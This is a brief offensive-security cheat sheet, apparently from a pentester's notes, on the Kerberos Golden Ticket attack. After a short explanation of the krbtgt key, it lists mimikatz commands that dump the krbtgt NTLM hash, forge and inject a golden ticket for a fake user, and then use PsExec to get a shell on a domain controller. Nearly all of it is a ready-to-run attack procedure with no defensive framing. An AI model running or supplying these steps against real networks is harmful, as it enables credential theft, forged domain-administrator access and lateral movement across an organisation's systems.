# Golden ticket attack

## Golden Ticket attack

Going back to the explanation of Kerberos authentication, we recall that when a user submits a request for a TGT, the KDC encrypts the TGT with a secret key known only to the KDCs in the domain. This secret key is actually the password hash of a domain user account called krbtgt. If we are able to get our hands on the krbtgt password hash, we could create our own self-made custom TGTs, or golden tickets

1. mimikatz.exe
2. privilege::debug
3. lsadump::lsa /patch\
   to get **krbtgt** ntlm hash
4. kerberos::purge
5. kerberos::golden /user:\<fakeuser> /domain:\<domain> /sid:\<sid> /krbtgt:\<krbtgt ntlm hash> /ptt
6. misc::cmd
7. psexec.exe \\\\\<dc\_machine> cmd.exe With the golden ticket injected into memory, we can launch a new command prompt with misc::cmd and again attempt lateral movement with PsExec
8. whoami
9. whoami /group for verification